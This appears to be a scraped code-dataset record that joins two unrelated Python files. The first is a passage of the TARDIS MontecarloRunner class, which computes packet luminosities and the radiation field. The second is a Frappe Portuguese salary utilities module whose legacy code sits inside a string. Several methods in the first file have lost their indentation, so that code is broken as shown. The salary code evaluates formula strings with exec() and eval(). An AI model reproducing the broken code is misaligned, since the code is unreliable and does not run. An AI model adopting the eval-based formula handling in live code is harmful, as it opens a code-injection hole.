            virtual_packet_flag=no_of_virtual_packets,
            nthreads=nthreads,
            last_run=last_run)
        # Workaround so that j_blue_estimator is in the right ordering
        # They are written as an array of dimension (no_of_shells, no_of_lines)
        # but python expects (no_of_lines, no_of_shells)
        self.j_blue_estimator = np.ascontiguousarray(
            self.j_blue_estimator.flatten().reshape(
                self.j_blue_estimator.shape, order='F')
        )
        self.Edotlu_estimator = np.ascontiguousarray(
            self.Edotlu_estimator.flatten().reshape(
                self.Edotlu_estimator.shape, order='F')
        )
    def legacy_return(self):
        # Legacy tuple interface retained for older callers
        return (self.output_nu, self.output_energy,
                self.j_estimator, self.nu_bar_estimator,
                self.last_line_interaction_in_id,
                self.last_line_interaction_out_id,
                self.last_interaction_type,
                self.last_line_interaction_shell_id)
    def get_line_interaction_id(self, line_interaction_type):
        # Map the mode name to the integer id used by the C code;
        # raises ValueError for an unknown mode name
        return ['scatter', 'downbranch', 'macroatom'].index(
            line_interaction_type)
    @property
    def output_nu(self):
        # Packet output frequencies with Hz units attached
        return u.Quantity(self._output_nu, u.Hz)
    @property
    def output_energy(self):
        # Packet output energies with erg units attached
        return u.Quantity(self._output_energy, u.erg)
@property
def virtual_packet_nu(self):
try:
return u.Quantity(self.virt_packet_nus, u.Hz)
except AttributeError:
warnings.warn(
"MontecarloRunner.virtual_packet_nu:"
"compile with --with-vpacket-logging"
"to access this property", UserWarning)
return None
@property
def virtual_packet_energy(self):
try:
return u.Quantity(self.virt_packet_energies, u.erg)
except AttributeError:
warnings.warn(
"MontecarloRunner.virtual_packet_energy:"
"compile with --with-vpacket-logging"
"to access this property", UserWarning)
return None
@property
def virtual_packet_luminosity(self):
try:
return self.virtual_packet_energy / self.time_of_simulation
except TypeError:
warnings.warn(
"MontecarloRunner.virtual_packet_luminosity:"
"compile with --with-vpacket-logging"
"to access this property", UserWarning)
return None
    @property
    def packet_luminosity(self):
        # Per-packet luminosity: output energy over the simulation time
        return self.output_energy / self.time_of_simulation
    @property
    def emitted_packet_mask(self):
        # Non-negative output energy marks escaped (emitted) packets;
        # reabsorbed packets carry negative energy (see _initialize_packets
        # sentinel of -99.0)
        return self.output_energy >= 0
    @property
    def emitted_packet_nu(self):
        return self.output_nu[self.emitted_packet_mask]
    @property
    def reabsorbed_packet_nu(self):
        return self.output_nu[~self.emitted_packet_mask]
    @property
    def emitted_packet_luminosity(self):
        return self.packet_luminosity[self.emitted_packet_mask]
    @property
    def reabsorbed_packet_luminosity(self):
        # Sign flipped so reabsorbed luminosity is reported positive
        return -self.packet_luminosity[~self.emitted_packet_mask]
    @property
    def montecarlo_reabsorbed_luminosity(self):
        # Reabsorbed-packet luminosity histogrammed onto the spectral
        # frequency grid, as erg/s
        return u.Quantity(
            np.histogram(
                self.reabsorbed_packet_nu,
                weights=self.reabsorbed_packet_luminosity,
                bins=self.spectrum_frequency.value)[0],
            'erg / s'
        )
    @property
    def montecarlo_emitted_luminosity(self):
        # Emitted-packet luminosity histogrammed onto the same grid
        return u.Quantity(
            np.histogram(
                self.emitted_packet_nu,
                weights=self.emitted_packet_luminosity,
                bins=self.spectrum_frequency.value)[0],
            'erg / s'
        )
    @property
    def montecarlo_virtual_luminosity(self):
        # Drop the trailing accumulator bin and normalise by the
        # simulation time
        return (
            self._montecarlo_virtual_luminosity[:-1] /
            self.time_of_simulation.value)
    def calculate_emitted_luminosity(self, luminosity_nu_start,
                                     luminosity_nu_end):
        # Total luminosity of emitted packets with frequency strictly
        # inside (luminosity_nu_start, luminosity_nu_end)
        luminosity_wavelength_filter = (
            (self.emitted_packet_nu > luminosity_nu_start) &
            (self.emitted_packet_nu < luminosity_nu_end))
        emitted_luminosity = self.emitted_packet_luminosity[
            luminosity_wavelength_filter].sum()
        return emitted_luminosity
    def calculate_reabsorbed_luminosity(
            self, luminosity_nu_start,
            luminosity_nu_end):
        # Same frequency window applied to the reabsorbed packets
        luminosity_wavelength_filter = (
            (self.reabsorbed_packet_nu > luminosity_nu_start) &
            (self.reabsorbed_packet_nu < luminosity_nu_end))
        reabsorbed_luminosity = self.reabsorbed_packet_luminosity[
            luminosity_wavelength_filter].sum()
        return reabsorbed_luminosity
    def calculate_radiationfield_properties(self):
        """
        Calculate an updated radiation field from the
        :math:`\\bar{\\nu}_\\textrm{estimator}` and
        :math:`J_\\textrm{estimator}` calculated in the montecarlo
        simulation. The details of the calculation can be found in the
        documentation.

        Reads ``self.nu_bar_estimator`` and ``self.j_estimator`` (set by
        the montecarlo run); takes no arguments.

        Returns
        -------
        t_rad : ~astropy.units.Quantity (float)
            Radiation temperature per shell, in Kelvin.
        w : ~numpy.ndarray (float)
            Dilution factor per shell.
        """
        # Radiation temperature from the ratio of the two estimators.
        t_rad = (
            self.t_rad_estimator_constant *
            self.nu_bar_estimator /
            self.j_estimator)
        # Dilution factor: estimated mean intensity relative to the
        # blackbody mean intensity at t_rad.
        w = self.j_estimator / (
            4 * const.sigma_sb.cgs.value * t_rad ** 4 *
            self.time_of_simulation.value *
            self.volume.value)
        return t_rad * u.K, w
    def calculate_luminosity_inner(self, model):
        # Blackbody luminosity of the inner boundary:
        # L = 4 * pi * sigma_sb * r_inner^2 * T_inner^4
        return (4 * np.pi * const.sigma_sb.cgs *
                model.r_inner[0] ** 2 * model.t_inner ** 4).to('erg/s')
    def calculate_time_of_simulation(self, model):
        # Simulation time normalised so the total packet energy is 1 erg.
        return (1.0 * u.erg / self.calculate_luminosity_inner(model))
    def calculate_f_nu(self, frequency):
        # Not implemented; placeholder kept for interface compatibility.
        pass
    def calculate_f_lambda(self, wavelength):
        # Not implemented; placeholder kept for interface compatibility.
        pass
@classmethod
def from_config(cls, config):
"""
Create a new MontecarloRunner instance from a Configuration object.
Parameters
----------
config : tardis.io.config_reader.Configuration
Returns
-------
MontecarloRunner
"""
if config.plasma.disable_electron_scattering:
logger.warn('Disabling electron scattering - this is not physical')
sigma_thomson = 1e-200 * (u.cm ** 2)
else:
logger.debug("Electron scattering switched on")
sigma_thomson = const.sigma_T.cgs
spectrum_frequency = quantity_linspace(
config.spectrum.stop.to('Hz', u.spectral()),
config.spectrum.start.to('Hz', u.spectral()),
num=config.spectrum.num + 1)
return cls(seed=config.montecarlo.seed,
spectrum_frequency=spectrum_frequency,
virtual_spectrum_range=config.montecarlo.virtual_spectrum_range,
sigma_thomson=sigma_thomson,
enable_reflective_inner_boundary=config.montecarlo.enable_reflective_inner_boundary,
inner_boundary_albedo=config.montecarlo.inner_boundary_albedo,
enable_full_relativity=config.montecarlo.enable_full_relativity,
line_interaction_type=config.plasma.line_interaction_type,
integrator_settings=config.spectrum.integrated,
v_packet_settings=config.spectrum.virtual)
|
en
| 0.529193
|
This class is designed as an interface between the Python part and the montecarlo C-part Initialize the output arrays of the montecarlo simulation. Parameters ---------- model: ~Radial1DModel # Estimators Generate the cgs like geometry arrays for the montecarlo part Parameters ---------- model : model.Radial1DModel Run the montecarlo calculation Parameters ---------- model : tardis.model.Radial1DModel plasma : tardis.plasma.BasePlasma no_of_packets : int no_of_virtual_packets : int nthreads : int last_run : bool Returns ------- None # Workaround so that j_blue_estimator is in the right ordering # They are written as an array of dimension (no_of_shells, no_of_lines) # but python expects (no_of_lines, no_of_shells) Calculate an updated radiation field from the :math: `\\bar{nu}_\\textrm{estimator}` and :math:`\\J_\\textrm{estimator}` calculated in the montecarlo simulation. The details of the calculation can be found in the documentation. Parameters ---------- nubar_estimator : ~np.ndarray (float) j_estimator : ~np.ndarray (float) Returns ------- t_rad : ~astropy.units.Quantity (float) w : ~numpy.ndarray (float) Create a new MontecarloRunner instance from a Configuration object. Parameters ---------- config : tardis.io.config_reader.Configuration Returns ------- MontecarloRunner
| 1.916362
| 2
|
l10n_pt_hr_salary/utils/utils.py
|
saguas/l10n_pt_hr_salary
| 0
|
6628150
|
<reponame>saguas/l10n_pt_hr_salary
# -*- coding: utf-8 -*-
import frappe
# NOTE(review): the remainder of this module is wrapped in a single
# module-level triple-quoted string, i.e. it is dead, never-executed
# legacy Python 2 code kept for reference only.
"""
@frappe.whitelist()
def calculate_earnings_description_old(earn_docs):
iliquid = 0
tributavel = 0
earn_docs = json.loads(earn_docs)
earnings_description = frappe._dict({
"tributavel": [],
"totals": [],
})
for doc in earn_docs:
doc = frappe._dict(doc)
e_type = frappe.utils.encode(doc.e_type)
doc_etype = frappe.get_doc("Earning Type", e_type)
incidence_base = frappe.utils.encode(doc_etype.incidence_base)
modified_value = doc.modified_value
iliquid += modified_value
if incidence_base == "Tributável":
precision = 2
tribut_value = get_tributavel_value(doc_etype, doc, precision)
if not tribut_value:
tribut_value = modified_value
earnings_description.tributavel.append({"e_type": e_type, "value": tribut_value})
tributavel += tribut_value
earnings_description.totals.append({"iliquid": iliquid, "tributavel": tributavel})
return earnings_description
def get_tributavel_value_old(doc_type, doc_struct, precision):
tributavel_value = None
tributavel_calcule = doc_type.tributavel_calcule
trib_expr = tributavel_calcule and get_split(tributavel_calcule) or []
is_diary = doc_type.diary_earning_
values = get_values_from_expression(doc_type, doc_struct, trib_expr, is_diary=is_diary)
if values:
tributavel_value = calculate(values, precision)
return tributavel_value
def get_values_from_expression(doc_type, doc_struct, expression_list, is_diary=False):
values = []
has_parents_f = 0
for expr in expression_list:
expr = expr.strip()
print "exprs %s" % expr
if expr.startswith("$(") or expr.startswith("($("):
name = get_regexp_name(expr).strip()
val = get_value_from_name(name, doc_type, doc_struct, is_diary=is_diary)
if expr.startswith("($"):
values.append("(")
has_parents_f += 1
values.append(val)
if expr.endswith("))") and has_parents_f > 0:
values.append(")")
has_parents_f -= 1
elif expr.startswith("$if(") or expr.startswith("($if("):
result = get_regexp_if_expression(expr)
if result:
if result.group(1):
exprss = result.group(1)
i = 0
start_symbol = get_symbol(i)
expression = if_split(exprss, start_symbol)
while not expression:
i += 1
start_symbol = get_symbol(i)
expression = if_split(exprss, start_symbol)
split_value = []
for name in expression:
name = name.strip()
if re.match("^[a-zA-Z]+.*", name):
val = get_value_from_name(name, doc_type, doc_struct, is_diary=is_diary)
split_value.append(val)
else:
split_value.append(flt(name))
l = len(split_value)
if l == 2 and result.group(2):
res = False
s = "if %s %s %s: res=%s" % (split_value[0], start_symbol, split_value[1], True)
exec(s)
if res:
v = process_expression(result.group(2).split(), doc_type, doc_struct, is_diary=is_diary)
if expr.startswith("($if("):
values.append("(")
has_parents_f += 1
values.extend(v)
if expr.endswith("])") and has_parents_f > 0:
values.append(")")
has_parents_f -= 1
elif expr in ("-", "+", "*", "/"):
values.append(expr)
elif expr.endswith(")") and has_parents_f > 0:
values.append(")")
has_parents_f -= 1
else:
values.append(expr)
return values
def get_value_from_name(name, doc_etype, doc, is_diary=False):
factor = 1
if name:
name = name.strip()
if name == "valor":
name = "modified_value"
if name == "value_reference" and is_diary:
factor = 31
if doc.get(name):
val = flt(getattr(doc, name, 0))*factor
elif hasattr(doc_etype, name):
val = flt(getattr(doc_etype, name, 0))*factor
else:
val = flt(0)
else:
val = flt(0)
return val
def process_expression(expression, doc_type, doc_struct, is_diary=False):
values = []
for name in expression:
print "name %s" % name
has_parents_f = False
has_parents_b = False
if name.startswith("("):
name = name[1:]
has_parents_f = "("
elif name.endswith(")"):
name = name[:-1]
has_parents_b = ")"
if re.match("^[a-zA-Z]+.*", name):
val = get_value_from_name(name, doc_type, doc_struct, is_diary=is_diary)
elif name in ("-", "+", "*", "/"):
val = name
else:
val = flt(name)
if has_parents_f:
val = "%s%s" %(has_parents_f, val)
elif has_parents_b:
val = "%s%s" %(val, has_parents_b)
values.append(val)
return values
def if_split(expr, symbol):
result = expr.split(symbol)
if len(result) == 1:
result = []
return result
def calculate(values, precision):
value = "".join(str(x) for x in values)
total = eval(value) or 0
return rounded(total, precision)
def get_regexp_name(content):
pattern = r"\(?\$\((.*?)\)"
result = re.match(pattern, content, re.I | re.S)
return result and result.group(1) or ""
def get_regexp_if_expression(content):
pattern = r"\(?\$if\((.*?)\)(?:\[(.*)\])?"
result = re.match(pattern, content, re.I | re.S)
return result
def get_split(content):
content = prepare_for_split(content)
_if_split = []
content_split = []
in_if = False
for s in content.strip().split():
if s.startswith("$(") or s.startswith("($("):
content_split.append(s)
in_if = False
continue
elif s.startswith("$if(") or s.startswith("($if("):
in_if = True
elif not in_if:
content_split.append(s)
continue
elif (s.endswith("]") or s.endswith("])")) and in_if:
in_if = False
_if_split.append(s)
content_split.append(" ".join(_if_split))
_if_split = []
continue
_if_split.append(s)
return content_split
def prepare_for_split(content):
pattern = r"([*+-/])"
result = re.sub(pattern, " \\1 ", content, flags=re.I | re.S)
return result
def get_symbol(pos):
op = ["=", ">", "<", "!"]
return op[pos]
"""
|
# -*- coding: utf-8 -*-
import frappe
# NOTE(review): the remainder of this module is wrapped in a single
# module-level triple-quoted string, i.e. it is dead, never-executed
# legacy Python 2 code kept for reference only.
"""
@frappe.whitelist()
def calculate_earnings_description_old(earn_docs):
iliquid = 0
tributavel = 0
earn_docs = json.loads(earn_docs)
earnings_description = frappe._dict({
"tributavel": [],
"totals": [],
})
for doc in earn_docs:
doc = frappe._dict(doc)
e_type = frappe.utils.encode(doc.e_type)
doc_etype = frappe.get_doc("Earning Type", e_type)
incidence_base = frappe.utils.encode(doc_etype.incidence_base)
modified_value = doc.modified_value
iliquid += modified_value
if incidence_base == "Tributável":
precision = 2
tribut_value = get_tributavel_value(doc_etype, doc, precision)
if not tribut_value:
tribut_value = modified_value
earnings_description.tributavel.append({"e_type": e_type, "value": tribut_value})
tributavel += tribut_value
earnings_description.totals.append({"iliquid": iliquid, "tributavel": tributavel})
return earnings_description
def get_tributavel_value_old(doc_type, doc_struct, precision):
tributavel_value = None
tributavel_calcule = doc_type.tributavel_calcule
trib_expr = tributavel_calcule and get_split(tributavel_calcule) or []
is_diary = doc_type.diary_earning_
values = get_values_from_expression(doc_type, doc_struct, trib_expr, is_diary=is_diary)
if values:
tributavel_value = calculate(values, precision)
return tributavel_value
def get_values_from_expression(doc_type, doc_struct, expression_list, is_diary=False):
values = []
has_parents_f = 0
for expr in expression_list:
expr = expr.strip()
print "exprs %s" % expr
if expr.startswith("$(") or expr.startswith("($("):
name = get_regexp_name(expr).strip()
val = get_value_from_name(name, doc_type, doc_struct, is_diary=is_diary)
if expr.startswith("($"):
values.append("(")
has_parents_f += 1
values.append(val)
if expr.endswith("))") and has_parents_f > 0:
values.append(")")
has_parents_f -= 1
elif expr.startswith("$if(") or expr.startswith("($if("):
result = get_regexp_if_expression(expr)
if result:
if result.group(1):
exprss = result.group(1)
i = 0
start_symbol = get_symbol(i)
expression = if_split(exprss, start_symbol)
while not expression:
i += 1
start_symbol = get_symbol(i)
expression = if_split(exprss, start_symbol)
split_value = []
for name in expression:
name = name.strip()
if re.match("^[a-zA-Z]+.*", name):
val = get_value_from_name(name, doc_type, doc_struct, is_diary=is_diary)
split_value.append(val)
else:
split_value.append(flt(name))
l = len(split_value)
if l == 2 and result.group(2):
res = False
s = "if %s %s %s: res=%s" % (split_value[0], start_symbol, split_value[1], True)
exec(s)
if res:
v = process_expression(result.group(2).split(), doc_type, doc_struct, is_diary=is_diary)
if expr.startswith("($if("):
values.append("(")
has_parents_f += 1
values.extend(v)
if expr.endswith("])") and has_parents_f > 0:
values.append(")")
has_parents_f -= 1
elif expr in ("-", "+", "*", "/"):
values.append(expr)
elif expr.endswith(")") and has_parents_f > 0:
values.append(")")
has_parents_f -= 1
else:
values.append(expr)
return values
def get_value_from_name(name, doc_etype, doc, is_diary=False):
factor = 1
if name:
name = name.strip()
if name == "valor":
name = "modified_value"
if name == "value_reference" and is_diary:
factor = 31
if doc.get(name):
val = flt(getattr(doc, name, 0))*factor
elif hasattr(doc_etype, name):
val = flt(getattr(doc_etype, name, 0))*factor
else:
val = flt(0)
else:
val = flt(0)
return val
def process_expression(expression, doc_type, doc_struct, is_diary=False):
values = []
for name in expression:
print "name %s" % name
has_parents_f = False
has_parents_b = False
if name.startswith("("):
name = name[1:]
has_parents_f = "("
elif name.endswith(")"):
name = name[:-1]
has_parents_b = ")"
if re.match("^[a-zA-Z]+.*", name):
val = get_value_from_name(name, doc_type, doc_struct, is_diary=is_diary)
elif name in ("-", "+", "*", "/"):
val = name
else:
val = flt(name)
if has_parents_f:
val = "%s%s" %(has_parents_f, val)
elif has_parents_b:
val = "%s%s" %(val, has_parents_b)
values.append(val)
return values
def if_split(expr, symbol):
result = expr.split(symbol)
if len(result) == 1:
result = []
return result
def calculate(values, precision):
value = "".join(str(x) for x in values)
total = eval(value) or 0
return rounded(total, precision)
def get_regexp_name(content):
pattern = r"\(?\$\((.*?)\)"
result = re.match(pattern, content, re.I | re.S)
return result and result.group(1) or ""
def get_regexp_if_expression(content):
pattern = r"\(?\$if\((.*?)\)(?:\[(.*)\])?"
result = re.match(pattern, content, re.I | re.S)
return result
def get_split(content):
content = prepare_for_split(content)
_if_split = []
content_split = []
in_if = False
for s in content.strip().split():
if s.startswith("$(") or s.startswith("($("):
content_split.append(s)
in_if = False
continue
elif s.startswith("$if(") or s.startswith("($if("):
in_if = True
elif not in_if:
content_split.append(s)
continue
elif (s.endswith("]") or s.endswith("])")) and in_if:
in_if = False
_if_split.append(s)
content_split.append(" ".join(_if_split))
_if_split = []
continue
_if_split.append(s)
return content_split
def prepare_for_split(content):
pattern = r"([*+-/])"
result = re.sub(pattern, " \\1 ", content, flags=re.I | re.S)
return result
def get_symbol(pos):
op = ["=", ">", "<", "!"]
return op[pos]
"""
|
en
| 0.245938
|
# -*- coding: utf-8 -*- @frappe.whitelist() def calculate_earnings_description_old(earn_docs): iliquid = 0 tributavel = 0 earn_docs = json.loads(earn_docs) earnings_description = frappe._dict({ "tributavel": [], "totals": [], }) for doc in earn_docs: doc = frappe._dict(doc) e_type = frappe.utils.encode(doc.e_type) doc_etype = frappe.get_doc("Earning Type", e_type) incidence_base = frappe.utils.encode(doc_etype.incidence_base) modified_value = doc.modified_value iliquid += modified_value if incidence_base == "Tributável": precision = 2 tribut_value = get_tributavel_value(doc_etype, doc, precision) if not tribut_value: tribut_value = modified_value earnings_description.tributavel.append({"e_type": e_type, "value": tribut_value}) tributavel += tribut_value earnings_description.totals.append({"iliquid": iliquid, "tributavel": tributavel}) return earnings_description def get_tributavel_value_old(doc_type, doc_struct, precision): tributavel_value = None tributavel_calcule = doc_type.tributavel_calcule trib_expr = tributavel_calcule and get_split(tributavel_calcule) or [] is_diary = doc_type.diary_earning_ values = get_values_from_expression(doc_type, doc_struct, trib_expr, is_diary=is_diary) if values: tributavel_value = calculate(values, precision) return tributavel_value def get_values_from_expression(doc_type, doc_struct, expression_list, is_diary=False): values = [] has_parents_f = 0 for expr in expression_list: expr = expr.strip() print "exprs %s" % expr if expr.startswith("$(") or expr.startswith("($("): name = get_regexp_name(expr).strip() val = get_value_from_name(name, doc_type, doc_struct, is_diary=is_diary) if expr.startswith("($"): values.append("(") has_parents_f += 1 values.append(val) if expr.endswith("))") and has_parents_f > 0: values.append(")") has_parents_f -= 1 elif expr.startswith("$if(") or expr.startswith("($if("): result = get_regexp_if_expression(expr) if result: if result.group(1): exprss = result.group(1) i = 0 start_symbol = get_symbol(i) 
expression = if_split(exprss, start_symbol) while not expression: i += 1 start_symbol = get_symbol(i) expression = if_split(exprss, start_symbol) split_value = [] for name in expression: name = name.strip() if re.match("^[a-zA-Z]+.*", name): val = get_value_from_name(name, doc_type, doc_struct, is_diary=is_diary) split_value.append(val) else: split_value.append(flt(name)) l = len(split_value) if l == 2 and result.group(2): res = False s = "if %s %s %s: res=%s" % (split_value[0], start_symbol, split_value[1], True) exec(s) if res: v = process_expression(result.group(2).split(), doc_type, doc_struct, is_diary=is_diary) if expr.startswith("($if("): values.append("(") has_parents_f += 1 values.extend(v) if expr.endswith("])") and has_parents_f > 0: values.append(")") has_parents_f -= 1 elif expr in ("-", "+", "*", "/"): values.append(expr) elif expr.endswith(")") and has_parents_f > 0: values.append(")") has_parents_f -= 1 else: values.append(expr) return values def get_value_from_name(name, doc_etype, doc, is_diary=False): factor = 1 if name: name = name.strip() if name == "valor": name = "modified_value" if name == "value_reference" and is_diary: factor = 31 if doc.get(name): val = flt(getattr(doc, name, 0))*factor elif hasattr(doc_etype, name): val = flt(getattr(doc_etype, name, 0))*factor else: val = flt(0) else: val = flt(0) return val def process_expression(expression, doc_type, doc_struct, is_diary=False): values = [] for name in expression: print "name %s" % name has_parents_f = False has_parents_b = False if name.startswith("("): name = name[1:] has_parents_f = "(" elif name.endswith(")"): name = name[:-1] has_parents_b = ")" if re.match("^[a-zA-Z]+.*", name): val = get_value_from_name(name, doc_type, doc_struct, is_diary=is_diary) elif name in ("-", "+", "*", "/"): val = name else: val = flt(name) if has_parents_f: val = "%s%s" %(has_parents_f, val) elif has_parents_b: val = "%s%s" %(val, has_parents_b) values.append(val) return values def if_split(expr, 
symbol): result = expr.split(symbol) if len(result) == 1: result = [] return result def calculate(values, precision): value = "".join(str(x) for x in values) total = eval(value) or 0 return rounded(total, precision) def get_regexp_name(content): pattern = r"\(?\$\((.*?)\)" result = re.match(pattern, content, re.I | re.S) return result and result.group(1) or "" def get_regexp_if_expression(content): pattern = r"\(?\$if\((.*?)\)(?:\[(.*)\])?" result = re.match(pattern, content, re.I | re.S) return result def get_split(content): content = prepare_for_split(content) _if_split = [] content_split = [] in_if = False for s in content.strip().split(): if s.startswith("$(") or s.startswith("($("): content_split.append(s) in_if = False continue elif s.startswith("$if(") or s.startswith("($if("): in_if = True elif not in_if: content_split.append(s) continue elif (s.endswith("]") or s.endswith("])")) and in_if: in_if = False _if_split.append(s) content_split.append(" ".join(_if_split)) _if_split = [] continue _if_split.append(s) return content_split def prepare_for_split(content): pattern = r"([*+-/])" result = re.sub(pattern, " \\1 ", content, flags=re.I | re.S) return result def get_symbol(pos): op = ["=", ">", "<", "!"] return op[pos]
| 2.187712
| 2
|